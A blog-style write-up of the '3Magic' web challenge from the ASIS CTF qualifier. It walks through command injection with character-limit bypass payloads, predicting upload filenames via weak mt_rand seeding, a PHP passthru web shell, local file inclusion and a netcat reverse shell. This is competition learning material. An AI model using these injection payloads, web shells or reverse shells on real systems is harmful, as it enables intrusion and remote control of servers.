Writeup – 3Magic (ASIS CTF Quals)

This weekend, I participated in the ASIS CTF Qualifier (I also participated in a reasonable amount of drinking, but this is another story entirely). One of the challenges which we encountered in this CTF was the “3Magic” challenge, which was a very nice web challenge.

This CTF began as your typical web CTF:

much typical. many internet points.

much typical. many internet points.

Putting in an IP address gives you the output of the “ping” command, so we figured our first step was command injection:

many pings. all the pings.

many pings. all the pings.

Unfortunately, we quickly ran into some hurdles around restricted characters – we quickly noticed that we couldn’t use spaces (but we could use {ls,-la} expansion to get around this), and we had a limit of 15 characters.

‘cat’ing “index.php” (via &cat<index.ph\p) revealed that there was a second page (“pages/Adm1n1sTraTi0n2.php”), which was a pretty straightforward setup: it took a file upload, and seemed to pass it through ImageMagick’s identify utility. I tried ImageTragick with SVG and MVG, but it didn’t work – a little Googling showed that PHP scripts would often use getimagesize(), which wouldn’t work on SVG’s or MVG’s, but we weren’t sure.

Coming back to the “ping” utility, we figured we needed a way to retrieve source code of the other pages. We tried every Linux trick we knew (protip: not many) but {grep,-nrw,.} worked in performing the equivalent of a recursive ‘cat’:

i like source code

i like source code

A little bit of scrolling later, and we get to the source code of the “administration2.php” page:

admin2 src pls

admin2 src pls

Here, we can immediately identify three vulnerabilities:

  • The page saves files to a fixed format, with the only unknown part being mt_rand()
  • The page leaks the result of a previous call to mt_rand() in a cookie, “test”
  • The page seeds mt_rand using a broken algorithm – more on this later.

We can also confirm that getimagesize() is blocking our use of SVG against ImageMagick (I’m not sure I believe the “/usr/bin/file -b” : I’ve never seen this command output like “identify”, which is what we saw).

With this information, we should be able to predict the filename of uploaded files,upload a PHP file appended to a legitimate image (remember, getimagesize()) and access it directly. The process for doing this is simple:

  • Brute force the seed to mt_srand()
  • Call mt_rand() once, check that it equals the value in our ‘test’ cookie.
  • Call mt_rand() again, this will be used to construct the full path of the file that out application is loaded to.

10 minutes later (most of which were spent on figuring out how to get the ‘test’ cookie: for some reason, the application didn’t send us one until we sent it our own ‘test’ cookie first), and we had a PHP script ready:

brute force

brute force

Accessing the URL gave us a 403 error, but this was easily overcome via index.php’s local file inclusion… feature. A small modification to our script, and we’re away:

gotcha you little shit

gotcha you little shit

That said, the flag was still hidden. We then uploaded a PHP passthru($_REQUEST[‘cmd’]); shell, and quickly identified /read_flag and /flag in the root directory. We base64’ed the /read_flag binary out, and a little bit of reverse engineering showed that it simply checked for an interactive terminal before giving you the flag.

From here, we used sent our PHP shell a command to netcat to a listening host, converted it to an interactive shell via /bin/sh -i (more on this here, you would be familiar with this problem if you do pwn challenges at all), executed /read_flag, gave it it’s input and got our flag:

great success!

great success!

As always, thanks to the ASIS CTF creators for putting on this fantastic CTF. Judging by the scoreboard, this one tended towards the more difficult end of town – but a fantastic experience nonetheless.

Looking forward to TU-CTF next weekend, thanks to everyone who came on Saturday and made this event a great experience!


About Norman

Sometimes, I write code. Occasionally, it even works.
This entry was posted in Bards, Computers, Jesting and tagged , , . Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )


Connecting to %s